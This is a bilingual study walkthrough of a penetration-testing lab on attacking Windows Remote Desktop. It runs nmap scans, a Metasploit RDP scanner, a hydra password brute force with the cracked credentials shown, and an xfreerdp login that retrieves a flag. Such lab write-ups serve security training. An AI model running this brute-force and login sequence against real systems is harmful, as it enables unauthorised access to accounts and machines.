Exploiting RDP
远程桌面协议 (RDP) 是微软开发的专有 GUI 远程访问协议,用于远程连接 Windows 系统并与之交互。
RDP 默认使用 TCP 端口 3389,也可以配置为在任何其他 TCP 端口上运行。
RDP 身份验证需要目标系统上的合法用户帐户以及明文形式的用户密码。
我们可以执行 RDP 暴力攻击来识别合法的用户凭据,我们可以使用这些凭据来远程访问目标系统。
Demo: Exploiting RDP
1
Target IP Address: 10.2.24.86
This particular port is not assigned to any service. RDP can be configured run on another port instead of default port.
1
2
3
nmap -sV -O 10.2.24.86
nmap -sV -p- 10.2.24.86
nmap -sV 10.2.24.86
How do you check a port and determine wether or not it is running RDP? One of the technique is connect to the target system and specify this particular port as a RDP port.
Another really helpful tool or module is the Metasploit module on RDP scanner.
To tell wether the particular port is running RDP.
Identify endpoints speaking the Remote Desktop Protocol (RDP)
识别使用远程桌面协议 (RDP) 的端点
此模块尝试连接到指定的远程桌面协议端口并确定它是否使用 RDP。 如果可用,凭据安全支持提供程序 (CredSSP) 协议将用于识别运行服务器的 Windows 版本。 启用 DETECT_NLA 选项将导致与服务器建立第二个连接,以确定是否需要网络级别身份验证 (NLA)。
1
2
3
4
5
6
7
8
service postgresql start && msfconsole
search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 10.2.24.86
set RPORT 3333
run
However, We can’t authenticate with target system via RDP because we don’t have any credentials. Performing Brute force on RDP.
-s
PORT: if the service is on a different default port, define it here
-s
PORT: 如果服务位于不同的默认端口,请在此处定义
-t
TASKS: run TASKS number of connects in parallel per target (default: 16)
-t
TASKS: 运行 TASKS 每个目标的并行连接数(默认值:16)
1
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.2.24.86 -s 3333
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
xfreerdp [file] [options] [/v:<server>[:port]]
/option:<value> (specifies option with value)
/p:<password> Password
/u:[[<domain>\]<user>|<user>[@<domain>]]
Username
/v:<server>[:port] Server hostname
Examples:
xfreerdp connection.rdp /p:Pwd123! /f
xfreerdp /u:CONTOSO\JohnDoe /p:Pwd123! /v:rdp.contoso.com
xfreerdp /u:JohnDoe /p:Pwd123! /w:1366 /h:768 /v:192.168.1.100:4489
xfreerdp /u:JohnDoe /p:Pwd123! /vmconnect:C824F53E-95D2-46C6-9A18-23A5BB403532 /v:192.168.1.100
1
xfreerdp /u:administrator /p:qwertyuiop /v:10.2.24.86:3333
Windows: Insecure RDP Service(Windows:不安全的 RDP 服务)
概述
向您提供了一台 Kali GUI 机器和一台运行易受攻击的 RDP 服务的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。
您的任务是使用 Kali 机器上可用的工具对正在运行的 RDP 服务及其有效端口进行指纹识别,然后使用适当的方法利用该漏洞。
注意: rdesktop 不适用于此设置,因为它不支持 NLA。请使用 xfreerdp 连接到 RDP 服务器。
目标: 利用应用程序并检索标志!
注意:rdesktop 不适用于此设置,因为它不支持 NLA。请使用 xfreerdp 连接到 RDP 服务器。
说明:
- 你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口 运行 “ip addr” 可以知道 X 和 Y 的值。
- 目标机器的 IP 地址在文件 “/root/Desktop/target” 中提到
- 不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关
- 要使用的字典:+
/usr/share/metasploit-framework/data/wordlists/common_users.txt
+/usr/share/metasploit-framework /data/wordlists/unix_passwords.txt
我自己的思路
1
Target IP Address : 10.0.16.124
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@attackdefense:~# nmap -sV 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:26 IST
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@attackdefense:~# nmap -sV -p- -O 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:31 IST
Stats: 0:02:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49178/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=9/15%OT=135%CT=1%CU=34927%PV=Y%DS=3%DC=I%G=Y%TM=632296
OS:17%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=7F%CD=Z)
Network Distance: 3 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.93 seconds
Identify endpoints speaking the Remote Desktop Protocol (RDP)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
10.0.16.124
msf5 > use auxiliary/scanner/rdp/rdp_scanner
msf5 auxiliary(scanner/rdp/rdp_scanner) > show options
Module options (auxiliary/scanner/rdp/rdp_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
DETECT_NLA true yes Detect Network Level Authentication (NLA)
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rhosts 10.0.16.124
rhosts => 10.0.16.124
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rport 3333
rport => 3333
msf5 auxiliary(scanner/rdp/rdp_scanner) > run
[*] 10.0.16.124:3333 - Detected RDP on 10.0.16.124:3333 (Windows version: 6.3.9600) (Requires NLA: Yes)
[*] 10.0.16.124:3333 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.0.16.124 -s 3333 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-15 08:55:26
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking rdp://10.0.16.124:3333/
[3333][rdp] host: 10.0.16.124 login: sysadmin password: samantha
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: demo password: victoria
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: auditor password: elizabeth
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: administrator password: qwertyuiop
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-15 08:56:09
1
xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@attackdefense:~# xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
[09:04:26:668] [177980:177981] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.0.16.124:3333)
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - Common Name (CN):
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - WIN-OMCNBKR66MN
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.0.16.124:3333 (RDP-Server):
Common Name: WIN-OMCNBKR66MN
Subject: CN = WIN-OMCNBKR66MN
Issuer: CN = WIN-OMCNBKR66MN
Thumbprint: 81:80:6a:ce:02:6f:0b:ca:67:da:6c:33:13:83:bf:b3:a6:53:a3:12
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
We login in as Administrator, and find flag.txt in C:\
:
1
port-number-3333
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1957.pdf
Identify endpoints speaking the Remote Desktop Protocol (RDP)
-
Previous
Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue) -
Next
Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)